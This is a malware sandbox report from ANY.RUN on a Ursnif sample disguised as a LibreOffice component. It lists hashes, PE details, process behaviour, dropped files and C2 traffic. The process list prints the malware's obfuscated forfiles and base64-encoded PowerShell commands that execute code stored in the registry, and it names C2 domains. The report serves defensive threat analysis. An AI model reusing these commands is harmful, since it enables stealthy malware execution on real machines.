analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

ursnif.bin

Full analysis: https://app.any.run/tasks/de02616f-d912-451b-8cc2-62896e272b8a
Verdict: Malicious activity
Analysis date: October 14, 2019, 07:55:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
evasion
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

7E72C94B81B431BEA7521322EEF4CB66

SHA1:

63DA160195231A188A0DFCC88B61D817D986CFED

SHA256:

9A20E75A6952945D97F6113AF62303B15A81D86D4FC88126AD37D859D7DAB965

SSDEEP:

3072:HnTHXRIusP5vuNUdJC2aICXOcCxqQ+jrdT:HDXGusPluNUdJC2a/XOczDVT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes settings of System certificates

      • ursnif.bin.exe (PID: 2368)

  • SUSPICIOUS

    • Executed via COM

      • iexplore.exe (PID: 2864)

    • Starts CMD.EXE for commands execution

      • forfiles.exe (PID: 944)
      • explorer.exe (PID: 1936)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2120)

    • Reads the machine GUID from the registry

      • powershell.exe (PID: 2756)
      • csc.exe (PID: 2700)
      • csc.exe (PID: 1836)
      • explorer.exe (PID: 1936)

    • Creates files in the user directory

      • powershell.exe (PID: 2756)
      • explorer.exe (PID: 1936)

    • Starts CMD.EXE for self-deleting

      • explorer.exe (PID: 1936)

  • INFO

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2864)

    • Reads settings of System Certificates

      • IEXPLORE.EXE (PID: 2728)
      • iexplore.exe (PID: 2864)
      • explorer.exe (PID: 1936)

    • Changes internet zones settings

      • iexplore.exe (PID: 2864)

    • Reads the machine GUID from the registry

      • iexplore.exe (PID: 2864)

    • Manual execution by user

      • forfiles.exe (PID: 944)
      • cmd.exe (PID: 1048)

    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 2728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:05:04 22:37:35+02:00
PEType: PE32
LinkerVersion: 14
CodeSize: 28672
InitializedDataSize: 106496
UninitializedDataSize: -
EntryPoint: 0x1000
OSVersion: 5
ImageVersion: -
SubsystemVersion: 5
Subsystem: Windows GUI
FileVersionNumber: 6.0.4.2
ProductVersionNumber: 6.0.4.2
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
CompanyName: The Document Foundation
ProductName: LibreOffice
ProductVersion: 6.0.4.2
FileVersion: 6.0.4.2
OriginalFileName: javaloaderlo.dll
InternalName: javaloaderlo
LegalCopyright: Copyright © 2000-2018 by LibreOffice contributors. All rights reserved.

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 04-May-2018 20:37:35
Detected languages:
  • English - United States
CompanyName: The Document Foundation
ProductName: LibreOffice
ProductVersion: 6.0.4.2
FileVersion: 6.0.4.2
OriginalFilename: javaloaderlo.dll
InternalName: javaloaderlo
LegalCopyright: Copyright © 2000-2018 by LibreOffice contributors. All rights reserved.

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000140

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 5
Time date stamp: 04-May-2018 20:37:35
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x000068F0
0x00007000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
5.83254
.rdata
0x00008000
0x00000594
0x00001000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
2.36109
.data
0x00009000
0x00002500
0x00002000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
4.78464
.CRT
0x0000C000
0x0001402F
0x00015000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
7.87402
.rsrc
0x00021000
0x00000660
0x00001000
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
2.30595

Resources

Title
Entropy
Size
Codepage
Language
Type
1
3.44424
772
UNKNOWN
English - United States
RT_VERSION
2
5.25203
691
UNKNOWN
English - United States
RT_MANIFEST

Imports

GDI32.dll
KERNEL32.dll
USER32.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
373
Monitored processes
13
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start ursnif.bin.exe iexplore.exe iexplore.exe forfiles.exe no specs cmd.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs csc.exe cvtres.exe no specs cmd.exe no specs timeout.exe no specs explorer.exe

Process information

PID
CMD
Path
Indicators
Parent process
2368"C:\Users\admin\Desktop\ursnif.bin.exe" C:\Users\admin\Desktop\ursnif.bin.exe
explorer.exe
User:
admin
Company:
The Document Foundation
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.0.4.2
2864"C:\Program Files\Internet Explorer\iexplore.exe" -EmbeddingC:\Program Files\Internet Explorer\iexplore.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
2728"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2864 CREDAT:267521 /prefetch:2C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
944"C:\Windows\System32\forfiles.exe" /p C:\Windows\system32 /s /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANQAxADEAQwBBAEEAQwAwAC0AQQAxADgANQAtADAANgBFADAALQA2ADUANgBBAC0ARQBFADIAQQBEADAAQgA1AEYARABFADUAfQAnACkALgBXAA==" /m p*ll.*eC:\Windows\System32\forfiles.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2120/c "powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANQAxADEAQwBBAEEAQwAwAC0AQQAxADgANQAtADAANgBFADAALQA2ADUANgBBAC0ARQBFADIAQQBEADAAQgA1AEYARABFADUAfQAnACkALgBXAA==C:\Windows\System32\cmd.exeforfiles.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2756powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwASQBkAGUAbgB0AGkAdABpAGUAcwBcAHsANQAxADEAQwBBAEEAQwAwAC0AQQAxADgANQAtADAANgBFADAALQA2ADUANgBBAC0ARQBFADIAQQBEADAAQgA1AEYARABFADUAfQAnACkALgBXAA==C:\Windows\system32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2700"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\f44qny8l.cmdline"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.5483 (Win7SP1GDR.050727-5400)
956C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE127.tmp" "c:\Users\admin\AppData\Local\Temp\CSCE126.tmp"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.5003 (Win7SP1GDR.050727-5400)
1836"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\h7qyxfbm.cmdline"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
8.0.50727.5483 (Win7SP1GDR.050727-5400)
840C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESE2BD.tmp" "c:\Users\admin\AppData\Local\Temp\CSCE2BC.tmp"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
8.00.50727.5003 (Win7SP1GDR.050727-5400)
Total events
3 051
Read events
2 871
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
9
Text files
7
Unknown types
4

Dropped files

PID
Process
Filename
Type
2864iexplore.exeC:\Users\admin\AppData\Local\Temp\~DFF40471363DCFC71F.TMP
MD5:
SHA256:
2864iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\favicon[1].ico
MD5:
SHA256:
2864iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
2756powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ONZ873ZDJBCU8IP3W4EA.temp
MD5:
SHA256:
2700csc.exeC:\Users\admin\AppData\Local\Temp\CSCE126.tmp
MD5:
SHA256:
2700csc.exeC:\Users\admin\AppData\Local\Temp\f44qny8l.pdb
MD5:
SHA256:
956cvtres.exeC:\Users\admin\AppData\Local\Temp\RESE127.tmp
MD5:
SHA256:
2700csc.exeC:\Users\admin\AppData\Local\Temp\f44qny8l.dll
MD5:
SHA256:
2700csc.exeC:\Users\admin\AppData\Local\Temp\f44qny8l.out
MD5:
SHA256:
2756powershell.exeC:\Users\admin\AppData\Local\Temp\h7qyxfbm.0.cs
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
36
TCP/UDP connections
18
DNS requests
20
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2864
iexplore.exe
GET
304
152.199.19.161:443
https://iecvlist.microsoft.com/ie11blocklist/1401746408/versionlistWin7.xml
US
whitelisted
2728
IEXPLORE.EXE
POST
200
46.29.166.6:443
https://adultprizes.xyz/index.htm
RU
text
44.4 Kb
unknown
2368
ursnif.bin.exe
POST
200
46.29.166.6:443
https://adultprizes.xyz/index.htm
RU
binary
29.4 Kb
unknown
2864
iexplore.exe
GET
200
152.199.19.161:443
https://iecvlist.microsoft.com/IE11/1479242656000/iecompatviewlist.xml
US
xml
351 Kb
whitelisted
2864
iexplore.exe
GET
200
204.79.197.200:443
https://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2864
iexplore.exe
GET
200
204.79.197.200:443
https://www.bing.com/favicon.ico
US
image
237 b
whitelisted
2368
ursnif.bin.exe
POST
200
46.29.166.6:443
https://adultprizes.xyz/index.htm
RU
binary
31.1 Kb
unknown
2864
iexplore.exe
GET
200
152.199.19.161:443
https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblocklist.bin
US
whitelisted
2368
ursnif.bin.exe
POST
200
46.29.166.6:443
https://adultprizes.xyz/index.htm
RU
binary
27.0 Kb
unknown
1936
explorer.exe
POST
200
194.147.32.248:443
https://carringtonit.xyz/index.html
unknown
binary
36.5 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2864
iexplore.exe
204.79.197.200:443
www.bing.com
Microsoft Corporation
US
whitelisted
2864
iexplore.exe
46.29.166.6:443
adultprizes.xyz
LLC Baxet
RU
unknown
2728
IEXPLORE.EXE
46.29.166.6:443
adultprizes.xyz
LLC Baxet
RU
unknown
2368
ursnif.bin.exe
46.29.166.6:443
adultprizes.xyz
LLC Baxet
RU
unknown
592
mscorsvw.exe
67.27.157.254:80
ctldl.windowsupdate.com
Level 3 Communications, Inc.
US
suspicious
1936
explorer.exe
194.147.32.248:443
carringtonit.xyz
unknown
2864
iexplore.exe
152.199.19.161:443
iecvlist.microsoft.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
77.68.17.108:80
curlmyip.net
1&1 Internet SE
GB
unknown
2596
mscorsvw.exe
2.16.186.74:80
crl.microsoft.com
Akamai International B.V.
whitelisted
1936
explorer.exe
77.68.17.108:80
curlmyip.net
1&1 Internet SE
GB
unknown

DNS requests

Domain
IP
Reputation
adultprizes.xyz
  • 46.29.166.6
unknown
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
api.bing.com
  • 13.107.5.80
whitelisted
iecvlist.microsoft.com
  • 152.199.19.161
whitelisted
r20swj13mr.microsoft.com
  • 152.199.19.161
whitelisted
carringtonit.xyz
  • 194.147.32.248
unknown
curlmyip.net
  • 77.68.17.108
shared
ctldl.windowsupdate.com
  • 67.27.157.254
  • 67.26.75.254
  • 67.27.157.126
  • 67.27.158.126
  • 8.248.117.254
whitelisted
crl.microsoft.com
  • 2.16.186.74
  • 2.16.186.120
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup)
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (curlmyip .net in DNS lookup)
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\amd64fre\base\isolation\com\enumidentityattribute.cpp, line 144
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
ursnif.bin